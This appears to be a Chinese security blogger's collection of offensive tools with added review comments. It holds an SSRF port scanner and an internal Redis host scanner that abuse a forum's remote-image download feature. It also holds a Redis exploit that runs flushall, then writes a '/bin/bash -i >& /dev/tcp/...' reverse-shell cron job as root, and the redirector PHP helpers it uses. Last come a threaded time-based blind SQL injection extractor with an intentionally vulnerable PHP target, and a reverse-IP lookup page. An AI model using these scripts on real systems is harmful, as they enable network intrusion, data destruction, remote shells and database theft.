
扫描本机开放的端口(利用 forum.php 的 downremoteimg 远程图片下载去请求 ssrf.php,ssrf.php 再 302 跳转到 ftp://127.0.0.1:端口;脚本把请求超时或任何异常一律当作"端口开放",所以结果只能作参考):

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-07-05 20:55:30
# @Last Modified by:   Lcy
# @Last Modified time: 2016-10-10 16:26:14
import requests
import threading
import Queue
import time

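threads_count = 2
que = Queue.Queue()
lock = threading.Lock()
threads = []
# Ports to probe on 127.0.0.1 through the SSRF chain.  Each one is queued as a
# string because it is interpolated straight into the request URL.
ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]
# The literal above repeats a few ports (389, 7001, 9088); queue each port once,
# preserving order, so nothing is probed twice.
_seen = set()
for i in ports:
    if i not in _seen:
        _seen.add(i)
        que.put(str(i))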
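def run():
    """Worker: probe every port left on the shared queue through the SSRF chain.

    Each port is reached as forum.php downremoteimg -> ssrf.php -> 302 to
    ftp://127.0.0.1:<port>.  The bare ``except`` *is* the detection heuristic:
    the request is given 2.8 s and any failure (timeout, connection error to
    the forum, anything else) is printed as "Open", on the assumption that a
    listening port makes the server-side fetch hang while a closed one fails
    fast.  Treat the output as a hint, not proof: if the forum or the
    redirector is down, every port will be reported as open.
    """
    while True:
        # Non-blocking get(): the original ``qsize() > 0`` check followed by a
        # blocking get() let two workers pass the check for the last item, after
        # which one of them blocked forever.
        try:
            p = que.get(block=False)
        except Queue.Empty:
            return
        print p + "       \r",
        try:
            url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=helo.jpg[/img]".format(
                port=p)
            requests.get(url,timeout=2.8)
        except:
            with lock:
                print "{port}  Open".format(port=p)

for i in range(threads_count):
    t = threading.Thread(target=run)
    threads.append(t)
    t.setDaemon(True)
    t.start()

# Wait for the workers, not merely for the queue to drain: the old
# ``while que.qsize() > 0: sleep`` loop let the interpreter exit (killing the
# daemon threads) while the last ``threads_count`` probes were still in flight,
# so their results were never printed.  Polling keeps Ctrl-C responsive.
while any(t.is_alive() for t in threads):
    time.sleep(0.5)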

扫描内网 10.171.x.x 中开放 6379 端口(Redis)的主机(对每台主机先探一个大概率没有服务的端口 65321,该请求超时/异常的主机视为不可达直接跳过;再探 6379,超时/异常即判定开放):

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-07-05 20:55:30
# @Last Modified by:   Lcy
# @Last Modified time: 2016-07-21 14:38:04
import requests
import threading
import Queue
import time
threads_count = 20
que = Queue.Queue()
lock = threading.Lock()
threads = []
# /16 prefix of the internal range to sweep.  The .0 and .255 values of the
# last two octets are deliberately left out.
ip = "10.171."
# Enqueue every 10.171.<a>.<b> for a, b in 1..254, third octet outermost, in
# exactly the order a nested loop would produce.
for addr in ("%s%d.%d" % (ip, a, b) for a in range(1, 255) for b in range(1, 255)):
    que.put(addr)
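def run():
    """Worker: take hosts off the queue and test each one for a listening 6379.

    Two SSRF requests per host, each given 5 s:
      1. a probe to port 65321 (presumably chosen because nothing listens
         there) -- if it raises, the host is treated as unreachable and
         silently skipped;
      2. the real probe to 6379 -- a normal response prints just the IP,
         while an exception (typically the timeout) prints "<ip>  6379 Open".
    As in the port scanner, *any* exception counts as "open", so the output is
    a hint rather than proof.  NOTE(review): the first request goes to
    http:// and the second to https:// on the same forum host; presumably
    unintentional, both URLs are kept exactly as written.
    """
    while True:
        # Non-blocking get(): the original ``qsize() > 0`` check followed by a
        # blocking get() let two workers pass the check for the last item, after
        # which one of them blocked forever.
        try:
            ip = que.get(block=False)
        except Queue.Empty:
            return
        try:
            url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
                ip=ip,
                port="65321")
            requests.get(url,timeout=5)
        except:
            # Baseline probe failed: host considered unreachable, move on.
            continue
        try:
            url = "https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
                ip=ip,
                port="6379")
            requests.get(url,timeout=5)
            with lock:
                print ip
        except :
            with lock:
                print "{ip}  6379 Open".format(ip=ip)

for i in range(threads_count):
    t = threading.Thread(target=run)
    threads.append(t)
    t.setDaemon(True)
    t.start()

# Wait for the workers, not merely for the queue to drain: the old
# ``while que.qsize() > 0: sleep`` loop let the interpreter exit (killing the
# daemon threads) while the last ``threads_count`` hosts were still being
# probed, so their results were never printed.  Polling keeps Ctrl-C responsive.
while any(t.is_alive() for t in threads):
    time.sleep(0.5)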

通过 SSRF(ssrf.php / shell.php 跳转到 dict://)操作内网 Redis,把反弹 shell 的计划任务写进 /var/spool/cron/root 并反弹 shell(注意:脚本第一步就是 flushall,会清空目标 Redis 的全部数据):

#!/usr/bin/env python
# coding=utf-8
# email: ringzero@0x557.org

import requests

# Target Redis (reachable only through the SSRF) and the host:port the reverse
# shell will call back to.
host = '10.171.26.22'
port = '6379'
bhost = 'phpinfo.me'
bport = '32'

# Vulnerable endpoint: the forum fetches whatever URL appears inside [img]...[/img].
vul_httpurl = 'https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]'

# Redirector helpers (ssrf.php / shell.php, listed below).  They answer with a
# Location header assembled from the query string, so the forum's outbound HTTP
# fetch is bounced to dict://<host>:<port>/<command> on the internal Redis.
# Every step appends "%23helo.jpg" (a "#helo.jpg" fragment), presumably so the
# forum accepts the URL as an image link.
_location = 'http://tools.phpinfo.me/ssrf.php'

shell_location = 'http://tools.phpinfo.me/shell.php'


# Step 1: FLUSHALL.
# NOTE(review): destructive -- every key in every database on the target is
# deleted, presumably so that the RDB file written in step 5 holds nothing but
# the cron line.  There is no confirmation prompt.  Each step prints the
# request URL and the length of the forum's response; that length is the only
# success signal the script has, and requests.get() is called without a
# timeout, so a hanging target stalls the script indefinitely.

_payload = '?s=dict%26ip={host}%26port={port}%26data=flushall'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



# Step 2: SET key "0" to the crontab line.  The command text itself lives in
# shell.php's Location header (set:0:"..."); only the target and the callback
# host/port are passed from here.  The entry runs
# "/bin/bash -i >& /dev/tcp/<bhost>/<bport> 0>&1" every minute.

_payload = '?s=dict%26ip={host}%26port={port}%26bhost={bhost}%26bport={bport}'.format(

    host = host,

    port = port,

    bhost = bhost,

    bport = bport)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(shell_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



# Step 3: CONFIG SET dir /var/spool/cron/ -- point the RDB dump at the cron spool.

_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dir:/var/spool/cron/'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



# Step 4: CONFIG SET dbfilename root -- so the dump lands at
# /var/spool/cron/root, which is presumably read by cron as root's crontab.

_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dbfilename:root'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



# Step 5: SAVE -- write the dump.  The file is RDB binary with the cron line
# embedded in it, so this presumably relies on cron tolerating the surrounding
# bytes; the leading/trailing "\x0a" in the payload are there to isolate the line.

_payload = '?s=dict%26ip={host}%26port={port}%26data=save'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)

ssrf.php:

<?php
// Minimal open redirector used as the second hop of the SSRF chain: scheme,
// host, port and path of the Location target all come straight from the query
// string, so the forum's HTTP fetch is bounced to e.g. ftp://127.0.0.1:22/ or
// dict://10.x.x.x:6379/<command>.
// NOTE(review): this is an open redirect *by design*.  Anyone who can reach the
// file can use it as a pivot, so it should only be deployed for the duration of
// a test.  Nothing is validated; a missing parameter just leaves an empty
// segment in the Location header (and raises a PHP notice).
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
header("Location: $scheme://$ip:$port/$data");
?>

 

shell.php:

<?php
// Variant of ssrf.php whose Location target is a fixed Redis SET command:
//   <scheme>://<ip>:<port>/set:0:"<cron line>"
// i.e. key "0" is set to a crontab entry that, every minute, runs
// /bin/bash -i >& /dev/tcp/<bhost>/<bport> 0>&1 -- a reverse shell to bhost:bport.
// The "\\x0a" / "\\x20" / "\\x26" sequences use a doubled backslash, so PHP
// emits the literal characters \x0a etc.; they are meant to be decoded by the
// receiving end (presumably Redis' quoted-string escapes) into the newlines,
// spaces and "&" the cron line needs.  Unlike ssrf.php, $_GET['data'] is not
// read here.  Same caveats: no validation, open redirect by design, test-only.
$ip = $_GET['ip'];
$port = $_GET['port'];
$bhost = $_GET['bhost'];
$bport = $_GET['bport'];
$scheme = $_GET['s'];
header("Location: $scheme://$ip:$port/set:0:\"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a\"");
?>

看了freebuf的mysql延迟注入课程,感觉他那个突破延迟注入时间限制的思路非常不错:不是一个 bit 一个 bit 串行地猜,而是把每个字符拆成 8 个 bit,8 个请求并发发出,每个请求只用 sleep 判断一个 bit 是 0 还是 1,这样一个字符只需等一轮延迟。

课程地址:http://yuntv.letv.com/bcloud.html?uu=cbb16903e4&vu=f69b1ac857&width=1024&height=576

然后自己写了个py的demo,代码写的渣勿笑~

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2015-08-29 22:26:17
# @Last Modified by:   Sunshie
# @Last Modified time: 2015-08-30 01:48:41
# blog:https://phpinfo.me
# 延迟注入工具
import urllib2
import time
import socket
import threading
import requests

class my_threading(threading.Thread):
		"""One thread per bit of one character of ``(select user())``.

		The injected payload asks MySQL whether bit ``str`` (1..8, most
		significant first, via lpad(bin(ord(...)),8,0)) of the character at
		1-based position ``x`` is 1 and, if so, sleeps 2 s.  request() gives
		up after 2 s and returns 'timeout', which is recorded as bit value 1;
		any other response is recorded as 0.  Results land in the module-level
		dict ``res`` under the key str(bit).
		"""
		def __init__(self, str,x):
				# ``str`` is the bit index (1..8); the name shadows the builtin
				# only inside this method.
				threading.Thread.__init__(self)
				self.str = str
				self.x = x
		def run(self):
			global res
			x=self.x
			j = self.str
			url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
			html = request(url) 
			verify = 'timeout' 
			# NOTE(review): request() also returns 'timeout' on any network
			# error, so a transient failure is recorded as a 1 bit.
			if verify not in html: 
				res[str(j)] = 0
			else:
				res[str(j)] = 1
	

def request(URL): 
	"""GET *URL* with a 2 s timeout; return the body, or the sentinel 'timeout'.

	The 2 s budget matches the sleep(2) in the bit-extraction payload, so a
	true condition shows up as a timeout.  NOTE(review): *every* exception --
	connection refused, an HTTP 4xx/5xx raised by urlopen, DNS failure -- takes
	the same path and is reported as 'timeout', which callers read as "condition
	true"; transient errors therefore corrupt extracted bits silently.  The
	extra time.sleep(2) after a failure presumably lets the server-side sleep
	finish before the next request is sent.
	"""
	user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } 
	req = urllib2.Request(URL, None, user_agent)  
	try: 
		# Local name shadows this function; harmless, since it is only used below.
		request = urllib2.urlopen(req,timeout=2) 
	except Exception ,e: 
		time.sleep(2)
		return 'timeout' 
	return request.read() 	

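def curl(url):
	"""Fetch *url* and return the elapsed wall-clock seconds as an int.

	Not called by the rest of this script (which uses request() instead), but
	kept as a plain timing probe.  Two defects fixed: time.clock() measures CPU
	time on Unix (and is removed in Python 3.8), which does not advance while
	the request waits on the network, and the original returned the raw clock
	value rather than end - start.  On a requests error the original message is
	printed and the process exits, as before.
	"""
	try:
		start = time.time()
		requests.get(url)
		elapsed = time.time() - start
	except requests.RequestException:
		print u"访问出错!"
		exit()
	return int(elapsed)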
def getLength():
	"""Find the length of ``(select user())`` by time-based probing.

	Tries i = 0, 1, 2, ... with the payload sleep(if(length(...)=i,1,0)) and
	returns the first i for which request() reports 'timeout'.
	NOTE(review): the loop has no upper bound, so if the injection point stops
	working this never returns; and because request() maps any error to
	'timeout', a transient failure is accepted as the length.  The payload
	sleeps 1 s per evaluation while request() waits only 2 s, so whether a
	true condition actually trips the timeout depends on how many rows the
	demo query evaluates sleep() for -- confirm against the test target.
	"""
	i = 0
	while True:
		print "[+] Checking: %s \r" %i
		url = "http://localhost/demo/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
		html = request(url) 
		verify = 'timeout' 
		if verify in html: 
			print u"[+] 数据长度为: %s" %i
			return i
		
		i = i + 1
def bin2dec(string_num):
	"""Parse *string_num* as a base-2 digit string and return its integer value."""
	return int(string_num, base=2)

def getData(dataLength):
	"""Extract *dataLength* characters of ``(select user())``, one at a time.

	For each 1-based position x, eight my_threading workers (one per bit
	j = 1..8) are started and joined; their 0/1 answers are read back from the
	module-level ``res`` in MSB-first order, converted with bin2dec/chr and
	appended to the result, which is printed at the end.
	NOTE(review): if a worker dies without recording its bit, the
	``res[str(i+1)]`` lookup raises KeyError.  Each character costs eight
	concurrent sleep(2) queries against the target.  chr() of an 8-bit value
	only reproduces single-byte characters; user() is ASCII so that is fine
	here, but other data may need a different decoding.
	"""
	global res
	data = ""
	for x in range(dataLength):
		x = x + 1
		threads = []
		for j in range(8):
			# ``result`` is overwritten below; this assignment is dead.
			result = ""
			j = j + 1
			sb = my_threading(j,x)
			sb.setDaemon(True)
			threads.append(sb)
		for t in threads:
				t.start()
		for t in threads:
				t.join()
		# Assemble the byte MSB first: res["1"] is bit 1 of lpad(bin(...),8,0).
		tmp = ""
		for i in range(8):
			tmp = tmp + str(res[str(i+1)])
		# Reset the shared dict before the next character's workers start.
		res = {}
		result = chr(bin2dec(tmp))
		print result
		data = data + result
		sb = None
	print "[+] ok!"
	print "[+] result:" + data


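if __name__ == '__main__':
	# Shared result dict that the per-bit worker threads fill in (see
	# my_threading and getData); it must exist at module level before
	# getData() runs.  The unused ``stop`` flag has been dropped.
	res = {}
	length = getLength()
	getData(length)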

1.php代码如下:

<?php
/* 
* @Author: Lcy
* @Date:   2015-08-29 22:09:59
* @Last Modified by:   Sunshie
* @Last Modified time: 2015-08-30 01:46:17
* Time-based (delay) injection test target.
*
* INTENTIONALLY VULNERABLE -- this is the demo endpoint the Python tool above
* is pointed at (http://localhost/demo/1.php).  Do not reuse any of it:
*   - $_GET['username'] is concatenated straight into the SQL string, which
*     is the blind injection point;
*   - the assembled query is echoed back unescaped (echo $sql), so the same
*     parameter is also reflected into the page;
*   - the connection is root with an empty password against the mysql system
*     database, through the legacy mysql_* functions (deprecated in PHP 5.5,
*     removed in PHP 7) instead of mysqli/PDO with prepared statements.
* Nothing from the query result is displayed, hence "no echo" injection point.
*/
header("Content-type:text/html;charset=utf8");
$link = mysql_connect("localhost", "root","");
mysql_select_db("mysql", $link);
mysql_set_charset("utf8");
$sql = "SELECT user FROM user where user='{$_GET['username']}'";
echo $sql;
$query = mysql_query($sql);
echo "这是一个没有任何回显的注入点";

?>

py

如果要爆数据啥的话,把py代码里面的 select%20user() 替换为你要执行的 sql 即可(注意 getLength 和 my_threading.run 两处的 URL 都要改,并且子查询要能作为单个值使用)。

https://phpinfo.me/bing.php  欢迎使用哦

代码:

 

<?php
 
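function getIp($url) {
        // Resolve a hostname to an IPv4 address by scraping ip138.com.
        // $url comes straight from the "domain" POST field, so it is URL-encoded
        // before being placed in the query string; without that a value such as
        // "x&action=..." could rewrite the upstream request.
        $data = file_get_contents("http://www.ip138.com/ips138.asp?ip=" . urlencode($url) . "&action=2");
        if($data !== false && preg_match("/(\d+\.\d+\.\d+\.\d+)<\/font>/", $data, $arr) && !empty($arr[1])) {
                return $arr[1];
        }
        // Fallback: hand the caller's input back unchanged (it may already be
        // an IP).  Callers must not echo this value unescaped -- it is still
        // attacker-controlled text.
        return $url;
}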
 
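function getBing($ip) {
        // Page through Bing "ip:<ip>" results and collect the site URLs found.
        // $ip is caller-supplied; rawurlencode() keeps it from injecting extra
        // query parameters into the Bing request.  The request deliberately
        // presents itself as BaiduSpider; the proxy line is left as an example.
        $ctx = stream_context_create(array(
                        'http' => array(
                                'timeout' => 30,
                                //'proxy' => 'tcp://113.47.46.152:1080',
                                'request_fulluri' => True,
                                'header'=> "User-Agent: BaiduSpider\r\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
                        )
                )
        );
        $q = rawurlencode($ip);
        $first = 1;
        $res = array();
        // Unbounded: the loop ends only when Bing stops rendering a "next page"
        // link or a fetch fails.
        while(true) {
                $url = "http://www.bing.com/search?q=ip%3A{$q}&go=%E6%8F%90%E4%BA%A4&qs=n&first={$first}&form=QBRE&pq=ip%3A{$q}&sc=0-0&sp=-1&sk=&cvid=5e52385772e24683a0bdf047de60abfc";
                $first = $first + 10;
                $result = file_get_contents($url, False, $ctx); 
                if($result === false) {
                        break;
                }
                // NOTE(review): inside [...] the "|" is a literal character, not
                // alternation, so the host/path classes are slightly looser than
                // presumably intended; they still exclude quotes and angle brackets.
                preg_match_all('/<h2><a href="((http|https):\/\/([\w|\.]+)\/)([\w|\/|&|=|\.|\?]+)?" h="ID=\w+,\w+\.\w+">/',$result,$arr);
                if(!empty($arr[1])) {
                        foreach($arr[1] as $v) {
                                array_push($res, $v);
                        } 
                }
                if(!preg_match('/<div class="sw_next">/', $result)) {
                        break;
                }
 
        }
        // array_values() re-indexes after de-duplication so json_encode() emits
        // a JSON array rather than an object with numeric keys.
        return array_values(array_unique($res));
}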
 
//getBing("58.96.186.133");
 
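function main() {
        // AJAX back-end: "getip" resolves a domain, "query" returns the JSON
        // list of sites Bing reports for one IP.  Both inputs are user-controlled.
        if(isset($_POST["action"])) {
                $action = trim($_POST["action"]);
                if($action == "getip") {
                        $domain = isset($_POST["domain"]) ? trim($_POST["domain"]) : "";
                        $ip = getIp($domain);
                        // getIp() returns the raw input when nothing could be
                        // resolved, so escape before reflecting it into the page
                        // (the front end inserts this response with .html()).
                        echo htmlspecialchars($ip, ENT_QUOTES, 'UTF-8');
                }
                if($action == "query") {
                        $ip = isset($_POST["ip"]) ? trim($_POST["ip"]) : "";
                        header("Content-Type: application/json; charset=utf-8");
                        // Only a syntactically valid IPv4 address is worth sending
                        // to Bing; anything else gets an empty result list.
                        if(filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
                                echo json_encode(array());
                                return;
                        }
                        $res = getBing($ip);
                        echo json_encode($res);
                }
        }
}
 
main();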
if(empty($_POST['action'])) {
?>
<!DOCTYPE html>
<html>
        <head>
                <title>必应接口C段查询|c段查询|旁站查询</title>
                <meta charset="utf-8">
                <meta >
                <link rel="stylesheet" href="//cdn.bootcss.com/bootstrap/3.3.5/css/bootstrap.min.css">
                <link rel="stylesheet" href="//cdn.bootcss.com/bootstrap/3.3.5/css/bootstrap-theme.min.css">
                <script src="//cdn.bootcss.com/jquery/1.11.3/jquery.min.js"></script>
                <script src="//cdn.bootcss.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
                <style type="text/css" media="screen">
                        .main{
                                width:90%;
                                //border:1px solid red;
                                margin-top:20px;
                        }
                        .ip{
                                margin-top:10px;
                        }
                        dd{
                                text-indent:10px;
                        }
                </style>
        </head>
        <body>
                <div class="container">
                        <div class="main">
                                <h1>必应接口C段查询 </h1>
                                <form class="form-inline">
                                        <div class="form-group" style="">
                                        <input type="text" id="domain" class="form-control" placeholder="输入你要查询的ip或域名">
                                        </div>
                                        <button type="submit" class="btn btn-success" id="getip">获取ip</button>
                                        <button type="submit" class="btn btn-info" id="query">查询</button>
                                </form>
                                <div class="alert alert-info ip" role="alert" style="display:none">IP:<span id="ip"></span><span id="se"></span></div>
                                <div class="progress" id="jd" style="display:none">
                                  <div class="progress-bar progress-bar-success progress-bar-striped" role="progressbar" aria-valuenow="40" id="b" aria-valuemin="0" aria-valuemax="100" style="width: 0%">
                                          <span class="sr-only">40% Complete (success)</span>
                                  </div>
                                </div>
                                <dl id="result">
 
                                </dl>
                        </div>
                </div>
        </body>
        <script type="text/javascript">
                // Next host in the /24 to query (1..255); reset on every "query" click.
                // NOTE(review): jQuery and Bootstrap above are loaded from a third-party
                // CDN with no integrity attribute, so the page trusts that CDN completely.
                var ipi = 1;
                $(function() {
                        // "获取ip": resolve the typed domain/IP via the getip action and
                        // display the /24 range that will be swept.
                        $("#getip").click(function() {
                                var domain = $("#domain").val();
                                if(domain == "") {
                                        alert("请输入ip或者域名");
                                        return false;
                                }
                                // The domain goes into the POST body unencoded; a "&" or "="
                                // in it would split the field.
                                $.post("","action=getip&domain="+domain,function(res) {
                                        var ip = res;
                                        // Rendered with .html(), so whatever the server returns
                                        // is interpreted as markup -- the server must escape it.
                                        $("#ip").html(ip);
                                        $(".ip").show();
                                        // arr/start/end are assigned without var: implicit globals.
                                        arr = ip.split(".");
                                        start = arr[0] + "." + arr[1] + "." + arr[2] + "." + 1;
                                        end = arr[0] + "." + arr[1] + "." + arr[2] + "." + 255;
                                        $("#se").html(" 查询ip段:" + start + "-" + end)
                                })
                        });
                         
                        // "查询": reset the progress bar and result list, then start the sweep.
                        $("#query").click(function() {
                                ipi=1;
                                $("#b").css("width","0%");
                                $("#result").html("");
                                $("#jd").show();
                                query();
                                 
                        });
                })
 
                // Query one host (ipi) of the /24, then schedule the next from the
                // success callback.  Requests are therefore serial, and a failed
                // request (no success callback) silently ends the sweep.
                function query() {
                        // NOTE(review): attaches a new no-op click handler on every call
                        // (up to 255 per sweep) and does not block re-entry -- the handler
                        // bound in the ready callback still fires.  Presumably meant to
                        // disable the button while a sweep is running.
                        $("#query").click(function() {
                                return;
                        });
                        var html = "";
                        var b = (ipi/255) * 100;
                        var ip = $("#ip").html();
                        if(ip == "") {
                                alert("骚年请先获取Ip哦");
                                return;
                        }
                        var arr = ip.split(".");
                        var ips = arr[0] + "." + arr[1] + "." + arr[2] + "." + ipi;
                         
                        $.post("","action=query&ip="+ips,function(res) {
                                $("#b").css("width",b+"%");
                                html += "<dt>"+ ips +"</dt>";
                                // Result URLs come from scraped Bing HTML and are placed into
                                // href and text without escaping; the server-side regex limits
                                // them to word characters and ./&=?|, which keeps quotes and
                                // angle brackets out, but that is the only defence.
                                for(var i in res) {
                                        html += "<dd><a href=\"" + res[i] + "\" target=\"_blank\">" + res[i]+"</a></dd>";
                                         
                                }
                                $("#result").append(html);
                                if(ipi<255) {
                                        ipi++;
                                        query();
                                }
                        },"json");
                }
        </script>
</html>
 
<?php
}
?>